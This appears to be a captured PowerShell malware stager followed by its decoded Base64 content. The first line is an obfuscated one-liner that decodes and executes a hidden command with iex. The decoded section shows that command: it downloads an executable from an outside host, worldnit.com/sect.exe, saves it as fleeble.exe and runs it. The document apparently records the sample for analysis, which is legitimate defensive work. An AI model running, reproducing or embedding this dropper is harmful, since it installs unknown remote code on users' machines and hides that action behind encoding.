iex([SYstEm.TexT.EncodInG]::UTF8.GetString([sySteM.conVert]::fRoMbaSe64sTRiNg('CihOZXctT2JqZWN0IHNZU3RlTS5ORXQud0VCQ0xJZU5UKS5ET1dObE9hZGZpbEUoJ2h0dHA6Ly93b3JsZG5pdC5jb20vc2VjdC5leGUnLCdmbGVlYmxlLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2ZsZWVibGUuZXhlJwoK')));exit

##### B64 CONTENT #####


(New-Object sYSteM.NEt.wEBCLIeNT).DOWNlOadfilE('http://worldnit.com/sect.exe','fleeble.exe');Start-Process 'fleeble.exe'

